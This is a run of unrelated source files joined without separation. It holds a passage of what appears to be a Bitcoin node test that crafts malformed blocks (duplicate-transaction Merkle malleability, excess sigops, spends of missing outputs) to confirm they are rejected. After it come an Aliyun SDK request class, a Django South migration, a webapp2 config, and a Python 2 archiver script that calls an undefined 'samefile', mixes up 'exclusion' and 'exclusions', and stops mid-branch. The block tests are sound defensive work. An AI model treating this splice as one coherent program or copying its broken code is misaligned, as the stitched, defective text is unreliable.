        self.move_tip(65)
        b69 = self.next_block(69, additional_coinbase_value=10)
        tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 10)
        self.update_block(69, [tx])
        self.sync_blocks([b69], True)
        self.save_spendable_output()

        # Test spending the outpoint of a non-existent transaction
        #
        # -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
        #                                                                                    \-> b70 (21)
        #
        self.log.info("Reject a block containing a transaction spending from a non-existent input")
        self.move_tip(69)
        b70 = self.next_block(70, spend=out[21])
        bogus_tx = CTransaction()
        bogus_tx.sha256 = uint256_from_str(b"23c70ed7c0506e9178fc1a987f40a33946d4ad4c962b5ae3a52546da53af0c5c")
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(bogus_tx.sha256, 0), b"", 0xffffffff))
        tx.vout.append(CTxOut(1, b""))
        b70 = self.update_block(70, [tx])
        self.sync_blocks([b70], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Test accepting an invalid block which has the same hash as a valid one (via merkle tree tricks)
        #
        #  -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
        #                                                                                      \-> b71 (21)
        #
        # b72 is a good block.
        # b71 is a copy of 72, but re-adds one of its transactions.  However, it has the same hash as b72.
        self.log.info("Reject a block containing a duplicate transaction but with the same Merkle root (Merkle tree malleability")
        self.move_tip(69)
        b72 = self.next_block(72)
        tx1 = self.create_and_sign_transaction(out[21], 2)
        tx2 = self.create_and_sign_transaction(tx1, 1)
        b72 = self.update_block(72, [tx1, tx2])  # now tip is 72
        b71 = copy.deepcopy(b72)
        b71.vtx.append(tx2)   # add duplicate tx2
        self.block_heights[b71.sha256] = self.block_heights[b69.sha256] + 1  # b71 builds off b69
        self.blocks[71] = b71

        assert_equal(len(b71.vtx), 4)
        assert_equal(len(b72.vtx), 3)
        assert_equal(b72.sha256, b71.sha256)

        self.move_tip(71)
        self.sync_blocks([b71], False, 16, b'bad-txns-duplicate', reconnect=True)

        self.move_tip(72)
        self.sync_blocks([b72], True)
        self.save_spendable_output()

        # Test some invalid scripts and MAX_BLOCK_SIGOPS
        #
        # -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
        #                                                                                    \-> b** (22)
        #

        # b73 - tx with excessive sigops that are placed after an excessively large script element.
        #       The purpose of the test is to make sure those sigops are counted.
        #
        #       script is a bytearray of size 20,526
        #
        #       bytearray[0-19,998]     : OP_CHECKSIG
        #       bytearray[19,999]       : OP_PUSHDATA4
        #       bytearray[20,000-20,003]: 521  (max_script_element_size+1, in little-endian format)
        #       bytearray[20,004-20,525]: unread data (script_element)
        #       bytearray[20,526]       : OP_CHECKSIG (this puts us over the limit)
        self.log.info("Reject a block containing too many sigops after a large script element")
        self.move_tip(72)
        b73 = self.next_block(73)
        size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5 + 1
        a = bytearray([OP_CHECKSIG] * size)
        a[MAX_BLOCK_SIGOPS - 1] = int("4e", 16)  # OP_PUSHDATA4

        element_size = MAX_SCRIPT_ELEMENT_SIZE + 1
        a[MAX_BLOCK_SIGOPS] = element_size % 256
        a[MAX_BLOCK_SIGOPS + 1] = element_size // 256
        a[MAX_BLOCK_SIGOPS + 2] = 0
        a[MAX_BLOCK_SIGOPS + 3] = 0

        tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
        b73 = self.update_block(73, [tx])
        assert_equal(get_legacy_sigopcount_block(b73), MAX_BLOCK_SIGOPS + 1)
        self.sync_blocks([b73], False, 16, b'bad-blk-sigops', reconnect=True)

        # b74/75 - if we push an invalid script element, all prevous sigops are counted,
        #          but sigops after the element are not counted.
        #
        #       The invalid script element is that the push_data indicates that
        #       there will be a large amount of data (0xffffff bytes), but we only
        #       provide a much smaller number.  These bytes are CHECKSIGS so they would
        #       cause b75 to fail for excessive sigops, if those bytes were counted.
        #
        #       b74 fails because we put MAX_BLOCK_SIGOPS+1 before the element
        #       b75 succeeds because we put MAX_BLOCK_SIGOPS before the element
        self.log.info("Check sigops are counted correctly after an invalid script element")
        self.move_tip(72)
        b74 = self.next_block(74)
        size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42  # total = 20,561
        a = bytearray([OP_CHECKSIG] * size)
        a[MAX_BLOCK_SIGOPS] = 0x4e
        a[MAX_BLOCK_SIGOPS + 1] = 0xfe
        a[MAX_BLOCK_SIGOPS + 2] = 0xff
        a[MAX_BLOCK_SIGOPS + 3] = 0xff
        a[MAX_BLOCK_SIGOPS + 4] = 0xff
        tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
        b74 = self.update_block(74, [tx])
        self.sync_blocks([b74], False, 16, b'bad-blk-sigops', reconnect=True)

        self.move_tip(72)
        b75 = self.next_block(75)
        size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42
        a = bytearray([OP_CHECKSIG] * size)
        a[MAX_BLOCK_SIGOPS - 1] = 0x4e
        a[MAX_BLOCK_SIGOPS] = 0xff
        a[MAX_BLOCK_SIGOPS + 1] = 0xff
        a[MAX_BLOCK_SIGOPS + 2] = 0xff
        a[MAX_BLOCK_SIGOPS + 3] = 0xff
        tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
        b75 = self.update_block(75, [tx])
        self.sync_blocks([b75], True)
        self.save_spendable_output()

        # Check that if we push an element filled with CHECKSIGs, they are not counted
        self.move_tip(75)
        b76 = self.next_block(76)
        size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5
        a = bytearray([OP_CHECKSIG] * size)
        a[MAX_BLOCK_SIGOPS - 1] = 0x4e  # PUSHDATA4, but leave the following bytes as just checksigs
        tx = self.create_and_sign_transaction(out[23], 1, CScript(a))
        b76 = self.update_block(76, [tx])
        self.sync_blocks([b76], True)
        self.save_spendable_output()

        # Test transaction resurrection
        #
        # -> b77 (24) -> b78 (25) -> b79 (26)
        #            \-> b80 (25) -> b81 (26) -> b82 (27)
        #
        #    b78 creates a tx, which is spent in b79. After b82, both should be in mempool
        #
        #    The tx'es must be unsigned and pass the node's mempool policy.  It is unsigned for the
        #    rather obscure reason that the Python signature code does not distinguish between
        #    Low-S and High-S values (whereas the bitcoin code has custom code which does so);
        #    as a result of which, the odds are 50% that the python code will use the right
        #    value and the transaction will be accepted into the mempool. Until we modify the
        #    test framework to support low-S signing, we are out of luck.
        #
        #    To get around this issue, we construct transactions which are not signed and which
        #    spend to OP_TRUE.  If the standard-ness rules change, this test would need to be
        #    updated.  (Perhaps to spend to a P2SH OP_TRUE script)
        self.log.info("Test transaction resurrection during a re-org")
        self.move_tip(76)
        b77 = self.next_block(77)
        tx77 = self.create_and_sign_transaction(out[24], 10 * COIN)
        b77 = self.update_block(77, [tx77])
        self.sync_blocks([b77], True)
        self.save_spendable_output()

        b78 = self.next_block(78)
        tx78 = self.create_tx(tx77, 0, 9 * COIN)
        b78 = self.update_block(78, [tx78])
        self.sync_blocks([b78], True)

        b79 = self.next_block(79)
        tx79 = self.create_tx(tx78, 0, 8 * COIN)
        b79 = self.update_block(79, [tx79])
        self.sync_blocks([b79], True)

        # mempool should be empty
        assert_equal(len(self.nodes[0].getrawmempool()), 0)

        self.move_tip(77)
        b80 = self.next_block(80, spend=out[25])
        self.sync_blocks([b80], False, request_block=False)
        self.save_spendable_output()

        b81 = self.next_block(81, spend=out[26])
        self.sync_blocks([b81], False, request_block=False)  # other chain is same length
        self.save_spendable_output()

        b82 = self.next_block(82, spend=out[27])
        self.sync_blocks([b82], True)  # now this chain is longer, triggers re-org
        self.save_spendable_output()

        # now check that tx78 and tx79 have been put back into the peer's mempool
        mempool = self.nodes[0].getrawmempool()
        assert_equal(len(mempool), 2)
        assert(tx78.hash in mempool)
        assert(tx79.hash in mempool)

        # Test invalid opcodes in dead execution paths.
        #
        #  -> b81 (26) -> b82 (27) -> b83 (28)
        #
        self.log.info("Accept a block with invalid opcodes in dead execution paths")
        b83 = self.next_block(83)
        op_codes = [OP_IF, OP_INVALIDOPCODE, OP_ELSE, OP_TRUE, OP_ENDIF]
        script = CScript(op_codes)
        tx1 = self.create_and_sign_transaction(out[28], out[28].vout[0].nValue, script)

        tx2 = self.create_and_sign_transaction(tx1, 0, CScript([OP_TRUE]))
        tx2.vin[0].scriptSig = CScript([OP_FALSE])
        tx2.rehash()

        b83 = self.update_block(83, [tx1, tx2])
        self.sync_blocks([b83], True)
        self.save_spendable_output()

        # Reorg on/off blocks that have OP_RETURN in them (and try to spend them)
        #
        #  -> b81 (26) -> b82 (27) -> b83 (28) -> b84 (29) -> b87 (30) -> b88 (31)
        #                                    \-> b85 (29) -> b86 (30)            \-> b89a (32)
        #
        self.log.info("Test re-orging blocks with OP_RETURN in them")
        b84 = self.next_block(84)
        tx1 = self.create_tx(out[29], 0, 0, CScript([OP_RETURN]))
        tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx1.calc_sha256()
        self.sign_tx(tx1, out[29])
        tx1.rehash()
        tx2 = self.create_tx(tx1, 1, 0, CScript([OP_RETURN]))
        tx2.vout.append(CTxOut(0, CScript([OP_RETURN])))
        tx3 = self.create_tx(tx1, 2, 0, CScript([OP_RETURN]))
        tx3.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx4 = self.create_tx(tx1, 3, 0, CScript([OP_TRUE]))
        tx4.vout.append(CTxOut(0, CScript([OP_RETURN])))
        tx5 = self.create_tx(tx1, 4, 0, CScript([OP_RETURN]))

        b84 = self.update_block(84, [tx1, tx2, tx3, tx4, tx5])
        self.sync_blocks([b84], True)
        self.save_spendable_output()

        self.move_tip(83)
        b85 = self.next_block(85, spend=out[29])
        self.sync_blocks([b85], False)  # other chain is same length

        b86 = self.next_block(86, spend=out[30])
        self.sync_blocks([b86], True)

        self.move_tip(84)
        b87 = self.next_block(87, spend=out[30])
        self.sync_blocks([b87], False)  # other chain is same length
        self.save_spendable_output()

        b88 = self.next_block(88, spend=out[31])
        self.sync_blocks([b88], True)
        self.save_spendable_output()

        # trying to spend the OP_RETURN output is rejected
        b89a = self.next_block("89a", spend=out[32])
        tx = self.create_tx(tx1, 0, 0, CScript([OP_TRUE]))
        b89a = self.update_block("89a", [tx])
        self.sync_blocks([b89a], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        self.log.info("Test a re-org of one week's worth of blocks (1088 blocks)")

        self.move_tip(88)
        LARGE_REORG_SIZE = 1088
        blocks = []
        spend = out[32]
        for i in range(89, LARGE_REORG_SIZE + 89):
            b = self.next_block(i, spend)
            tx = CTransaction()
            script_length = MAX_BLOCK_BASE_SIZE - len(b.serialize()) - 69
            script_output = CScript([b'\x00' * script_length])
            tx.vout.append(CTxOut(0, script_output))
            tx.vin.append(CTxIn(COutPoint(b.vtx[1].sha256, 0)))
            b = self.update_block(i, [tx])
            assert_equal(len(b.serialize()), MAX_BLOCK_BASE_SIZE)
            blocks.append(b)
            self.save_spendable_output()
            spend = self.get_spendable_output()

        self.sync_blocks(blocks, True, timeout=180)
        chain1_tip = i

        # now create alt chain of same length
        self.move_tip(88)
        blocks2 = []
        for i in range(89, LARGE_REORG_SIZE + 89):
            blocks2.append(self.next_block("alt" + str(i)))
        self.sync_blocks(blocks2, False, request_block=False)

        # extend alt chain to trigger re-org
        block = self.next_block("alt" + str(chain1_tip + 1))
        self.sync_blocks([block], True, timeout=180)

        # ... and re-org back to the first chain
        self.move_tip(chain1_tip)
        block = self.next_block(chain1_tip + 1)
        self.sync_blocks([block], False, request_block=False)
        block = self.next_block(chain1_tip + 2)
        self.sync_blocks([block], True, timeout=180)

    # Helper methods
    ################

    def add_transactions_to_block(self, block, tx_list):
        """Rehash every transaction in tx_list, then append them all to block.vtx.

        block: the block object whose vtx list is extended in place.
        tx_list: transactions to add; each gets rehash() called first so its
            cached txid is up to date before it is committed to the block.
        """
        # Plain loop rather than a throwaway list comprehension: the loop is
        # executed purely for the rehash() side effect.
        for tx in tx_list:
            tx.rehash()
        block.vtx.extend(tx_list)

    # this is a little handier to use than the version in blocktools.py
    def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])):
        """Build an unsigned tx spending output *n* of *spend_tx* for *value* to *script*.

        Convenience wrapper around blocktools' create_tx_with_script with a
        default anyone-can-spend output script.
        """
        new_tx = create_tx_with_script(spend_tx, n, amount=value, script_pub_key=script)
        return new_tx

    # sign a transaction, using the key we know about
    # this signs input 0 in tx, which is assumed to be spending output n in spend_tx
    def sign_tx(self, tx, spend_tx):
        """Sign input 0 of tx, assumed to spend output 0 of spend_tx.

        If spend_tx's output 0 is anyone-can-spend (scriptPubKey starts with
        OP_TRUE) an empty scriptSig suffices; otherwise the input is signed
        with self.coinbase_key using SIGHASH_ALL.
        """
        scriptPubKey = bytearray(spend_tx.vout[0].scriptPubKey)
        if (scriptPubKey[0] == OP_TRUE):  # an anyone-can-spend
            tx.vin[0].scriptSig = CScript()
            return
        # NOTE(review): the err value from SignatureHash is ignored here --
        # presumably fine for the fixed scripts used by this test; verify.
        (sighash, err) = SignatureHash(spend_tx.vout[0].scriptPubKey, tx, 0, SIGHASH_ALL)
        tx.vin[0].scriptSig = CScript([self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))])

    def create_and_sign_transaction(self, spend_tx, value, script=CScript([OP_TRUE])):
        """Create, sign and rehash a tx spending output 0 of *spend_tx* for *value* to *script*."""
        signed_tx = self.create_tx(spend_tx, 0, value, script)
        self.sign_tx(signed_tx, spend_tx)
        signed_tx.rehash()
        return signed_tx

    def next_block(self, number, spend=None, additional_coinbase_value=0, script=CScript([OP_TRUE]), solve=True):
        """Create a new block on top of the current tip and make it the tip.

        number: key under which the block is stored in self.blocks (must be new).
        spend: optional previous transaction; if given, its output 0 is spent,
            sending 1 satoshi to *script* and the rest (minus 1) to coinbase fees.
        additional_coinbase_value: extra satoshis added to the coinbase output
            (used by tests that deliberately over/under-claim the subsidy).
        script: scriptPubKey for the spending transaction's output.
        solve: if True, grind the block's proof-of-work before returning.
        """
        if self.tip is None:
            # Building on genesis; offset time so the block is after it.
            base_block_hash = self.genesis_hash
            block_time = int(time.time()) + 1
        else:
            base_block_hash = self.tip.sha256
            block_time = self.tip.nTime + 1
        # First create the coinbase
        height = self.block_heights[base_block_hash] + 1
        coinbase = create_coinbase(height, self.coinbase_pubkey)
        coinbase.vout[0].nValue += additional_coinbase_value
        coinbase.rehash()
        if spend is None:
            block = create_block(base_block_hash, coinbase, block_time)
        else:
            coinbase.vout[0].nValue += spend.vout[0].nValue - 1  # all but one satoshi to fees
            coinbase.rehash()
            block = create_block(base_block_hash, coinbase, block_time)
            tx = self.create_tx(spend, 0, 1, script)  # spend 1 satoshi
            self.sign_tx(tx, spend)
            self.add_transactions_to_block(block, [tx])
            block.hashMerkleRoot = block.calc_merkle_root()
        if solve:
            block.solve()
        # Bookkeeping mirrored by update_block: track tip, height and store.
        self.tip = block
        self.block_heights[block.sha256] = height
        assert number not in self.blocks
        self.blocks[number] = block
        return block

    # save the current tip so it can be spent by a later block
    def save_spendable_output(self):
        """Remember the current tip so its coinbase can be spent by a later block."""
        # Lazy %-style logging args: the (potentially large) tx repr is only
        # built if debug logging is actually enabled.
        self.log.debug("saving spendable output %s", self.tip.vtx[0])
        self.spendable_outputs.append(self.tip)

    # get an output that we previously marked as spendable
    def get_spendable_output(self):
        """Pop and return the coinbase tx of the oldest saved spendable block (FIFO)."""
        # Lazy %-style logging args: only stringify the tx if debug is enabled.
        self.log.debug("getting spendable output %s", self.spendable_outputs[0].vtx[0])
        return self.spendable_outputs.pop(0).vtx[0]

    # move the tip back to a previous block
    def move_tip(self, number):
        """Rewind the internal tip to the previously created block *number*."""
        target = self.blocks[number]
        self.tip = target

    # adds transactions to the block and updates state
    def update_block(self, block_number, new_transactions):
        """Append new_transactions to stored block *block_number*, re-solve it
        and make it the tip.

        If the block hash changes, the entry in self.block_heights is moved to
        the new hash so height bookkeeping stays consistent.
        """
        blk = self.blocks[block_number]
        self.add_transactions_to_block(blk, new_transactions)
        previous_hash = blk.sha256
        blk.hashMerkleRoot = blk.calc_merkle_root()
        blk.solve()
        # Update the internal state just like in next_block.
        self.tip = blk
        if blk.sha256 != previous_hash:
            self.block_heights[blk.sha256] = self.block_heights[previous_hash]
            del self.block_heights[previous_hash]
        self.blocks[block_number] = blk
        return blk

    def bootstrap_p2p(self):
        """Add a P2P connection to the node.

        Helper to connect and wait for version handshake. Blocks until the
        node's initial getheaders has been received (see comment below).
        """
        self.nodes[0].add_p2p_connection(P2PDataStore())
        # We need to wait for the initial getheaders from the peer before we
        # start populating our blockstore. If we don't, then we may run ahead
        # to the next subtest before we receive the getheaders. We'd then send
        # an INV for the next block and receive two getheaders - one for the
        # IBD and one for the INV. We'd respond to both and could get
        # unexpectedly disconnected if the DoS score for that error is 50.
        self.nodes[0].p2p.wait_for_getheaders(timeout=5)

    def reconnect_p2p(self):
        """Tear down and bootstrap the P2P connection to the node.

        The node gets disconnected several times in this test. This helper
        method drops any existing p2p connections and re-establishes one via
        bootstrap_p2p (including the version/getheaders handshake wait).
        """
        self.nodes[0].disconnect_p2ps()
        self.bootstrap_p2p()

    def sync_blocks(self, blocks, success=True, reject_code=None, reject_reason=None, request_block=True, reconnect=False, timeout=60):
        """Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block.

        Call with success = False if the tip shouldn't advance to the most recent block.

        blocks: list of blocks to send, in order.
        success: whether the node's tip is expected to advance to the last block.
        reject_code/reject_reason: expected p2p reject code/reason, if any.
        request_block: whether the node is expected to request the block(s).
        reconnect: tear down and re-establish the p2p connection afterwards
            (used when the node disconnects/bans the peer for the bad block).
        timeout: per-call timeout in seconds.
        """
        self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_code=reject_code, reject_reason=reject_reason, request_block=request_block, timeout=timeout)

        if reconnect:
            self.reconnect_p2p()

# Script entry point: run the full-block functional test.
if __name__ == '__main__':
    FullBlockTest().main()

'''
Created by auto_sdk on 2015.06.23
'''
from aliyun.api.base import RestApi
class Rds20140815CheckAccountNameAvailableRequest(RestApi):
	"""Aliyun RDS API request: check whether an account name is available (API version 2014-08-15)."""
	def __init__(self,domain='rds.aliyuncs.com',port=80):
		RestApi.__init__(self,domain, port)
		# Request parameters -- set by the caller before issuing the request.
		self.AccountName = None
		self.DBInstanceId = None
		self.resourceOwnerAccount = None

	def getapiname(self):
		"""Return the fully qualified API method name used for request routing."""
		return 'rds.aliyuncs.com.CheckAccountNameAvailable.2014-08-15'

# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """South schema migration: add the optional 'color' field to the Idea model."""

    def forwards(self, orm):
        """Apply the migration."""
        # Adding field 'Idea.color'
        db.add_column(u'brainstorming_idea', 'color',
                      self.gf('django.db.models.fields.CharField')(default='', max_length=100, blank=True),
                      keep_default=False)


    def backwards(self, orm):
        """Revert the migration."""
        # Deleting field 'Idea.color'
        db.delete_column(u'brainstorming_idea', 'color')


    # Frozen ORM model definitions (auto-generated by South; do not edit by hand).
    models = {
        u'brainstorming.brainstorming': {
            'Meta': {'ordering': "['-created']", 'object_name': 'Brainstorming'},
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'creator_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
            'creator_ip': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'id': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        u'brainstorming.brainstormingwatcher': {
            'Meta': {'ordering': "['-created']", 'unique_together': "(('brainstorming', 'email'),)", 'object_name': 'BrainstormingWatcher'},
            'brainstorming': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brainstorming.Brainstorming']"}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'})
        },
        u'brainstorming.emailverification': {
            'Meta': {'ordering': "['-created']", 'object_name': 'EmailVerification'},
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
            'id': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'})
        },
        u'brainstorming.idea': {
            'Meta': {'ordering': "['-created']", 'object_name': 'Idea'},
            'brainstorming': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brainstorming.Brainstorming']"}),
            'color': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'creator_ip': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'creator_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'ratings': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'text': ('django.db.models.fields.TextField', [], {}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
        }
    }

    complete_apps = ['brainstorming']
import os
import webapp2

from actions import cronActions
from views import views
import secrets

# One week, in seconds; used for session and cookie lifetimes.
SECS_PER_WEEK = 60 * 60 * 24 * 7

# App Engine sets SERVER_SOFTWARE; anything not starting with
# "Development" is treated as the production runtime.
PRODUCTION_MODE = not os.environ.get(
    'SERVER_SOFTWARE', 'Development').startswith('Development')

ROOT_DIRECTORY = os.path.dirname(__file__)

if PRODUCTION_MODE:
    TEMPLATE_DIRECTORY = os.path.join(ROOT_DIRECTORY, 'dist')
else:
    # Enable ctypes -> Jinja2 tracebacks on the dev server sandbox.
    from google.appengine.tools.devappserver2.python import sandbox
    sandbox._WHITE_LIST_C_MODULES += ['_ctypes', 'gestalt']
    TEMPLATE_DIRECTORY = os.path.join(ROOT_DIRECTORY, 'src')

curr_path = os.path.abspath(os.path.dirname(__file__))


# webapp2 configuration: session cookie settings and the Jinja2 template path.
config = {
    'webapp2_extras.sessions': {
        'secret_key': secrets.COOKIE_KEY,
        'session_max_age': SECS_PER_WEEK,
        'cookie_args': {'max_age': SECS_PER_WEEK},
        'cookie_name': 'echo_sense_session'
    },
    'webapp2_extras.jinja2': {
        'template_path': TEMPLATE_DIRECTORY
    }
}

app = webapp2.WSGIApplication(
    [
        # Cron jobs (see cron.yaml)
        webapp2.Route('/cron/monthly', handler=cronActions.Monthly),
        webapp2.Route(r'/<:.*>', handler=views.ActionPotentialApp, name="ActionPotentialApp"),
    ], debug=True, config=config)

# this is the interface for `python archiver`

import archiver
import appdirs
import os
import sys
import pickle
import json

from archiver.archiver import Archiver
from archiver.parser import parseArgs

# Parse the archiver command-line arguments (command + options).
args = parseArgs()

from edit import edit

# ==============================================

# Debug aid: echo the parsed command-line arguments.
print args

# TODO: see http://stackoverflow.com/questions/13168083/python-raw-input-replacement-that-uses-a-configurable-text-editor

# ------------------------------------------------------------
# load the user data
# ------------------------------------------------------------

# get the user data directory (per-user location for settings/data files)
user_data_dir = appdirs.user_data_dir('FileArchiver', 'jdthorpe')
if not os.path.exists(user_data_dir):
    os.makedirs(user_data_dir)

# LOAD THE INDEX NAMES AND ACTIVE INDEX
indexes_path = os.path.join(user_data_dir, 'INDEXES.json')
if os.path.exists(indexes_path):
    with open(indexes_path, 'rb') as fh:
        indexes = json.load(fh)
else:
    # First run: start an empty registry ('active' is an index into 'names').
    # (The original re-checked and re-created user_data_dir here; that was
    # redundant -- the makedirs above guarantees it already exists.)
    indexes = {'active': None, 'names': []}

def dumpIndexes():
    """Persist the index registry (names + active index) to INDEXES.json."""
    with open(indexes_path, 'wb') as handle:
        json.dump(indexes, handle)

# ------------------------------------------------------------
# ------------------------------------------------------------

def getActiveName():
    # ACTIVE INDEX NUMER
    activeIndex = indexes['active']
    if activeIndex is None:
        print "No active index.  Use 'list -i' to list available indexies and 'use' to set an active index."
        sys.exit()

    # GET THE NAME OF THE INDEX
    try:
        activeIndexName = indexes['names'][indexes['active']]
    except:
        print "Invalid index number"
        sys.exit()
    return activeIndexName

# ------------------------------------------------------------
# READ-WRITE UTILITY FUNCTIONS
# ------------------------------------------------------------

# TODO: catch specific excepitons:
#        except IOError:
#            # no such file
#        except ValueError as e:
#            # invalid json file

def readSettings(name):
    """ A utility function which loads the index settings from file.

    Exits the process with a message if the file is missing or not valid JSON.
    """
    try:
        with open(os.path.join(user_data_dir, name + ".settings"), 'rb') as fh:
            settings = json.load(fh)
    except Exception as e:
        # Missing or corrupt settings file; report and bail out.
        # (Removed a leftover `import pdb; pdb.set_trace()` debugging hook
        # that would drop end users into the debugger.)
        print "Error reading index settings"
        sys.exit()
    return settings

def readData(name):
    """ A utility function which loads the index data (pickle) from file.

    Exits the process with a message if the file is missing or unreadable.
    """
    try:
        with open(os.path.join(user_data_dir, name + ".data"), 'rb') as fh:
            data = pickle.load(fh)
    except Exception as e:
        # (Removed a leftover `import pdb; pdb.set_trace()` debugging hook.)
        print "Error reading index data"
        sys.exit()
    return data

def dumpSettings(settings, name):
    """ A utility function which saves the index settings to file.

    Exits the process with a message if the file cannot be written.
    """
    try:
        with open(os.path.join(user_data_dir, name + ".settings"), 'wb') as fh:
            json.dump(settings, fh)
    except Exception as e:
        # (Removed a leftover `import pdb; pdb.set_trace()` debugging hook.)
        print "Error writing index settings"
        sys.exit()

def dumpData(data, name):
    """ A utility function which saves the index data (pickle) to file.

    Exits the process with a message if the file cannot be written.
    """
    try:
        with open(os.path.join(user_data_dir, name + ".data"), 'wb') as fh:
            pickle.dump(data, fh)
    except Exception:
        # Was a bare except; narrowed so KeyboardInterrupt/SystemExit pass
        # through.  (Removed a leftover pdb.set_trace() debugging hook.)
        print "Error writing index data"
        sys.exit()


# ------------------------------------------------------------
# ------------------------------------------------------------

if args.command == 'add':

    activeName = getActiveName()
    settings = readSettings(activeName)

    if args.source is not None:

        source = os.path.abspath(args.source)

        if not os.path.exists(source):
            print 'WARNING: no such directory "%s"'%(source)
        elif not os.path.isdir(source):
            print 'ERROR: "%s" is not a directory'%(source)
            sys.exit()

        print 'Adding source directory: %s'%(source)
        if not any(samefile(source,f) for f in settings['sourceDirectories']):
            settings['sourceDirectories'].append(source)

    elif args.exclusions is not None:

        import re
        try:
            re.compile(args.exclusion)
        except re.error:
            print 'Invalid regular expression "%s"'%(args.exclusion)
            sys.exit()
            
        if args.noic:
            settings['directoryExclusionPatterns'].append(args.exclusion)
        else:
            settings['directoryExclusionPatterns'].append((args.exclusion,2)) # re.I == 2

    elif args.archive is not None:

        raise NotImplementedError
        if settings['archiveDirectory'] is not None:
            print "Archive path has already been set use 'remove' to delete the archive path before setting a new archive path" 

        archiveDirectory = os.path.abspath(args.archive)
        if not os.path.exists(archiveDirectory):
            if args.create :
                os.makedirs(archiveDirectory)
            else:
                print 'ERROR: no such directory "%s"'%(archiveDirectory)
                sys.exit()
        elif not os.path.isdir(archiveDirectory):
            print '"%s" is not a directory'%(archiveDirectory)
            sys.exit()

        print 'Setting archive directory to: %s'%(archiveDirectory)
        settings['archiveDirectory'] = args.archive

    else:
        raise NotImplementedError
        print 'Error in Arg Parser'
        sys.exit()

    dumpSettings(settings,activeName)

elif args.command == 'list':

    if args.sources:

        for f in readSettings(getActiveName())['sourceDirectories']:
            print f

    elif args.exclusions:

        for f in readSettings(getActiveName())['directoryExclusionPatterns']:
            print f

    elif args.archive:

        print readSettings(getActiveName())['archiveDirectory']

    elif args.files:

        archiver = Archiver()
        archiver.data = readData(getActiveName())
        for f in archiver:
            print f

    elif args.indexes:

        print 'Active Index: %s (*)'%(getActiveName())
        print 'Index Names: '
        for i,name in enumerate(indexes['names']):
            print ' %s  %i: %s'%(
                    (' ','*')[(i == indexes['active'])+0],
                    i+1,
                    name,
                    )

    else:

        print 'Error in Arg Parser'

elif args.command == 'remove':

    activeName = getActiveName()
    settings = readSettings(activeName)

    if args.source is not None:

        if not (1 <= args.source <= len(settings['sourceDirectories'])):
            print 'Invalid index %i'%(args.source)

        del settings['sourceDirectories'][args.source - 1]

    elif args.exclusion is not None:

        raise NotImplementedError
        if not (1 <= args.exclusion <= len(settings['directoryExclusionPatterns'])):
            print 'Invalid index %i'%(args.exclusion)

        del settings['directoryExclusionPatterns'][args.exclusion - 1]

    elif args.archive is not None:

        raise NotImplementedError
        settings['archiveDirectory'] = None

    else:

        raise NotImplementedError
        print 'Error in Arg Parser'
        sys.exit()

    dumpSettings(settings,activeName)

elif args.command == 'update':
